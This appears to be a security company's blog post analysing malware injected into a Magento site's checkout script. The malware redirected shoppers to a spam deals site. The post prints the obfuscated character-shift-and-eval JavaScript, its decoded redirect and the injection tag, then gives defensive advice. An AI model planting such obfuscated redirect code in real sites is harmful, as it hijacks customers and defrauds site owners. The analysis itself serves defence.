With the holiday season around the corner, ecommerce sites are very valuable to website owners and equally attractive to attackers. Hackers have been targeting Magento installations in order to steal sensitive information like credit card data or PayPal logins, but in this case, promote websites for their monetary gain. Being PCI compliant is becoming increasingly critical as attacks on ecommerce sites continue to evolve.
After the consumer has made the decision to purchase, the checkout process becomes one of the most important steps for any business. The user experience during this process sets the tone for the entire interaction and usually leads to a successful sale. When the visitor’s experience is disrupted, both the sale and their trust is often lost.
Checkout Page Redirect
During our malware investigation process, we found an interesting piece of code that redirected users to an external page not intended by the website owner during the checkout process.
The browsing and shopping experience remained unmodified until the consumer began to check out. After selecting the products and clicking “Proceed to checkout” the user was redirected to hxxp://bestdealsweek[.]com – instead of the payment page.
We took a look at the code to understand what was responsible for this redirect. Inside /js/varien/accordion.js we located the malicious code.
Here is the content (obfuscated):
var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]
iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);
JavaScript Layer Creation
This particular file, coupled with /skin/frontend/base/default/js/opcheckout.js, creates a JavaScript Layer responsible for:
- Submitting step data to the checkout controller
- Interpreting controller responses to update the content of the checkout steps.
This layer allows the checkout process to be completed without the browser needing to load every request in a new page.
Here’s how the accordion.js was injected into the One Page checkout:
<script type="text/javascript"src="hxxps://domain/js/varien/accordion.js"></script>
After decoding it, we can see the redirect that happens within the user’s open tab:
var delay = 100;
setTimeout("document.location.href='hxxp://bestdealsweek.com'",delay);
This is one of the many injection techniques attackers have been using against Magento ecommerce sites to make a profit off of vulnerable sites. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files) and using a Website Application Firewall.
Employing an Integrity Monitoring system to detect file modifications and creating a regular backup strategy will also benefit you in the case of a compromise.
That’s why as a site owner you need to make sure where your “addons” are coming from, as a site developer you must examine the code of every addon you install carefully. Free addons should be avoided, and even paid ones should be checked rigorously.